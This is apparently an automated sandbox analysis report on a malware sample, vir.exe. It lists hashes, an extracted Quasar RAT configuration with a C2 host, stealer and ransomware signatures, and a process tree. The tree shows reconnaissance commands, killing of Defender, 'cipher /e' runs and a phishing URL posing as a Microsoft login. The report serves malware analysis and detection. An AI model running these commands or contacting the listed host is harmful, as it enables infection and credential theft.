Resubmissions

17-01-2025 11:40

250117-ns1f3svrfx 10

26-12-2024 15:01

241226-sec6vayjgx 10

27-09-2024 10:28

240927-mh3m1sxgrm 10

18-08-2024 19:49

240818-yjmtqsthkm 10

18-08-2024 14:30

240818-rvdxmsxgjg 10

15-08-2024 23:29

240815-3g3jmawdnq 10

15-08-2024 23:15

240815-28syts1brg 10

Analysis

  • max time kernel
    302s
  • max time network
    311s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-01-2025 11:40

General

  • Target

    vir.exe

  • Size

    336.1MB

  • MD5

    bc82ea785da1180a8a964b3e54ad106c

  • SHA1

    4c1952ce778455af8ed10dca7b9f77d7815e8d0a

  • SHA256

    c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b

  • SHA512

    62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b

  • SSDEEP

    6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Signatures

  • Detect Umbral payload 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Djvu family
  • MassLogger

    Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.

  • MassLogger Main payload 2 IoCs
  • Masslogger family
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Njrat family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Windows security bypass 2 TTPs 7 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Disables RegEdit via registry modification 1 IoCs
  • Drops file in Drivers directory 6 IoCs
  • Manipulates Digital Signatures 1 TTPs 1 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 5 IoCs
  • .NET Reactor proctector 35 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 19 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 48 IoCs
  • Loads dropped DLL 10 IoCs
  • Modifies file permissions 1 TTPs 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 6 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

  • AutoIT Executable 4 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 44 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 61 IoCs
  • Drops file in Windows directory 31 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 18 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 20 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 17 IoCs
  • Runs regedit.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 63 IoCs
  • Suspicious use of SendNotifyMessage 45 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\vir.exe
    C:\Users\Admin\AppData\Local\Temp\vir.exe sh $MOZILLA/ %SIGINT% "SIGTERM|DESTROY|SIGKILL"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:384
    • C:\Users\Admin\AppData\Local\Temp\928aa84e-2505-4f7a-a318-a83ea2e7e9b8\ProgressBarSplash.exe
      "C:\Users\Admin\AppData\Local\Temp\928aa84e-2505-4f7a-a318-a83ea2e7e9b8\ProgressBarSplash.exe" -unpacking
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:452
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\!main.cmd" "sh" "$MOZILLA/" "%SIGINT%" "SIGTERM|DESTROY|SIGKILL""
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3284
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K spread.cmd
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1016
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 1 C:\Users\Admin\Desktop
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:4216
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 2 C:\Users\Admin\Desktop
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:3324
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 3 C:\Users\Admin\
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:3636
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K doxx.cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1144
        • C:\Windows\SysWOW64\ipconfig.exe
          ipconfig
          4⤵
          • System Location Discovery: System Language Discovery
          • Gathers network information
          PID:348
        • C:\Windows\SysWOW64\net.exe
          net accounts
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4620
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 accounts
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4040
        • C:\Windows\SysWOW64\net.exe
          net user
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:440
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4144
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /apps /v /fo table
          4⤵
          • Enumerates processes with tasklist
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1416
      • C:\Windows\SysWOW64\PING.EXE
        ping google.com -t -n 1 -s 4 -4
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:1264
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im WindowsDefender.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4936
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K handler.cmd
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4808
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ2
        3⤵
        • Manipulates Digital Signatures
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff856aa46f8,0x7ff856aa4708,0x7ff856aa4718
          4⤵
            PID:2700
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
            4⤵
              PID:1064
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2024
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
              4⤵
                PID:1096
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
                4⤵
                  PID:3332
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
                  4⤵
                    PID:3224
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
                    4⤵
                      PID:6056
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
                      4⤵
                        PID:4980
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
                        4⤵
                          PID:4140
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
                          4⤵
                            PID:5484
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
                            4⤵
                              PID:5376
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 /prefetch:8
                              4⤵
                                PID:2808
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 /prefetch:8
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5372
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
                                4⤵
                                  PID:5852
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
                                  4⤵
                                    PID:2300
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1940 /prefetch:1
                                    4⤵
                                      PID:6920
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
                                      4⤵
                                        PID:6940
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6628 /prefetch:2
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:7068
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1
                                        4⤵
                                          PID:1740
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1
                                          4⤵
                                            PID:6948
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:1
                                            4⤵
                                              PID:7156
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6964 /prefetch:1
                                              4⤵
                                                PID:7144
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
                                                4⤵
                                                  PID:1644
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1284 /prefetch:1
                                                  4⤵
                                                    PID:1008
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18344848708558364681,15671343533784706969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
                                                    4⤵
                                                      PID:1616
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /K cipher.cmd
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4724
                                                    • C:\Windows\SysWOW64\cipher.exe
                                                      cipher /e
                                                      4⤵
                                                        PID:6028
                                                      • C:\Windows\SysWOW64\cipher.exe
                                                        cipher /e
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1320
                                                      • C:\Windows\SysWOW64\cipher.exe
                                                        cipher /e
                                                        4⤵
                                                          PID:5012
                                                        • C:\Windows\SysWOW64\cipher.exe
                                                          cipher /e
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5664
                                                      • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\Rover.exe
                                                        Rover.exe
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4968
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\web.htm
                                                        3⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:396
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff856aa46f8,0x7ff856aa4708,0x7ff856aa4718
                                                          4⤵
                                                            PID:2868
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,840939975252090632,9171886396456864191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
                                                            4⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5616
                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\Google.exe
                                                          Google.exe
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:4288
                                                        • C:\Windows\SysWOW64\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\helper.vbs"
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5196
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping google.com -t -n 1 -s 4 -4
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          • Runs ping.exe
                                                          PID:2156
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping mrbeast.codes -t -n 1 -s 4 -4
                                                          3⤵
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          • Runs ping.exe
                                                          PID:5752
                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                          xcopy Google.exe C:\Users\Admin\Desktop
                                                          3⤵
                                                          • Enumerates system info in registry
                                                          PID:2680
                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                          xcopy Rover.exe C:\Users\Admin\Desktop
                                                          3⤵
